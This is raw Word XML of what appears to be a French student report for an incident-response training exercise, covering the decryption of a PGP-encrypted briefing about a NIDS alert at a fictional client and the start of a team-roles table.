    <w:p w14:paraId="56E49E5C" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BCBA4A2" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3155FC3C" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66F86AA6" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B61B30D" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25E54528" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39C4780B" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03DDB8AC" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EE1499F" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB8FFFB" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C415CDA" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BAA9075" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C86102B" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BE28039" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B328ABF" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74675250" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02BB94F4" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B021577" w14:textId="77777777" w:rsidR="00093849" w:rsidRDefault="00093849" w:rsidP="000938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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CEF5981" w14:textId="77777777" w:rsidR="00222143" w:rsidRDefault="00222143" w:rsidP="00222143">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc197502157"/>
      <w:r w:rsidRPr="00222143">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Warm up question:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00222143">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CF0E33" w14:textId="77777777" w:rsidR="00222143" w:rsidRDefault="00222143" w:rsidP="000938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4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="740E764D" w14:textId="0549A1C1" w:rsidR="00093849" w:rsidRDefault="00222143" w:rsidP="002221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bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00222143">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Why did your boss sent you this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00222143">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>message ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00222143">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explain what you had to do to go through this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315143B3" w14:textId="77777777" w:rsidR="00222143" w:rsidRDefault="00222143" w:rsidP="002221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bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AAC8F63" w14:textId="18411917" w:rsidR="00E85F8C" w:rsidRPr="00E85F8C" w:rsidRDefault="00124446" w:rsidP="00E85F8C">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>boss</w:t>
      </w:r>
      <w:r w:rsidR="00E85F8C" w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D6EF4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">nous a </w:t>
      </w:r>
      <w:r w:rsidR="00E85F8C" w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">envoyé ce message chiffré pour </w:t>
      </w:r>
      <w:r w:rsidR="004D6EF4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nous assigner</w:t>
      </w:r>
      <w:r w:rsidR="00E85F8C" w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> une mission critique d’investigation</w:t>
      </w:r>
      <w:r w:rsidR="00E85F8C" w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Une alerte de sécurité a été déclenchée par le </w:t>
      </w:r>
      <w:r w:rsidR="00E85F8C" w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NIDS</w:t>
      </w:r>
      <w:r w:rsidR="00E85F8C" w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de notre client </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E85F8C" w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CandyRiver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E85F8C" w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, et la gravité de l’incident (classé </w:t>
      </w:r>
      <w:r w:rsidR="00E85F8C" w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>P1 - Critique</w:t>
      </w:r>
      <w:r w:rsidR="00E85F8C" w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) justifiait l’ouverture d’une procédure de réponse à incident.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5905B41C" w14:textId="24599E3E" w:rsidR="00E85F8C" w:rsidRPr="00E85F8C" w:rsidRDefault="00E85F8C" w:rsidP="00E85F8C">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le message contenait des </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>détails techniques confidentiels</w:t>
      </w:r>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, donc il a été </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chiffré avec PGP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour garantir la confidentialité des données en transit. La </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>passphrase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> m’a été transmise séparément via </w:t>
      </w:r>
      <w:r w:rsidR="00E67A95">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>l’application de messagerie privé</w:t>
      </w:r>
      <w:r w:rsidR="00CE2EC2">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">e sécurisée </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Signal, afin d’éviter toute compromission :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C20B876" w14:textId="2B72CC36" w:rsidR="00E85F8C" w:rsidRPr="00E85F8C" w:rsidRDefault="0069772F" w:rsidP="00E85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b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Passphrase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="00E85F8C" w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>uoqu1xo4Ahkoang7sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E51711E" w14:textId="77777777" w:rsidR="00E85F8C" w:rsidRPr="00E85F8C" w:rsidRDefault="00E85F8C" w:rsidP="00E85F8C">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">J’ai utilisé la commande suivante pour déchiffrer le fichier </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MeetingNotes.pdf.asc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C9238C" w14:textId="02EB352E" w:rsidR="00E85F8C" w:rsidRPr="00E85F8C" w:rsidRDefault="00BB4B42" w:rsidP="00E85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hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4B42">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1463D07F" wp14:editId="0D757260">
            <wp:extent cx="5943600" cy="815975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1788511189" name="Image 1" descr="Une image contenant texte, Logiciel multimédia,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11189" name="Image 1" descr="Une image contenant texte, Logiciel multimédia, Police, logiciel&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="815975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33655347" w14:textId="332876E2" w:rsidR="00E85F8C" w:rsidRPr="00E85F8C" w:rsidRDefault="00E85F8C" w:rsidP="00E85F8C">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le fichier déchiffré m’a permis de lire les </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">notes de réunion entre mon supérieur et le CISO de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CandyRiver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, me </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>donnant</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> des informations précieuses sur l’environnement réseau, les systèmes exposés, et les premières constatations internes.</w:t>
      </w:r>
      <w:r w:rsidR="004D6EF4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Cette étape était indispensable pour comprendre </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>le contexte de l’alerte</w:t>
      </w:r>
      <w:r w:rsidRPr="00E85F8C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, organiser l’équipe et commencer l’analyse technique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFD0900" w14:textId="59AAF9D4" w:rsidR="00222143" w:rsidRDefault="009D0492" w:rsidP="009D0492">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc197502158"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Question 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="0145B19B" w14:textId="77777777" w:rsidR="009D0492" w:rsidRDefault="009D0492" w:rsidP="009D0492">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F6EDB52" w14:textId="2AC1833A" w:rsidR="009D0492" w:rsidRDefault="00407A80" w:rsidP="009D0492">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00407A80">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Identify in your group the role of the different people and what each of you is going to do:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C239165" w14:textId="77777777" w:rsidR="00407A80" w:rsidRDefault="00407A80" w:rsidP="009D0492">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableauGrille4-Accentuation1"/>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4110"/>
      </w:tblGrid>
      <w:tr w:rsidR="00951144" w14:paraId="68B7AFAB" w14:textId="77777777" w:rsidTr="00615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none" w:sz="0" w:space="0" w:color="auto"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5FA983E8" w14:textId="0E74E2CD" w:rsidR="00951144" w:rsidRDefault="005C7956" w:rsidP="00372CA9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Rôle</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="05363A4B" w14:textId="3627D1E6" w:rsidR="00951144" w:rsidRDefault="00AA5B2B" w:rsidP="00372CA9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Nom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
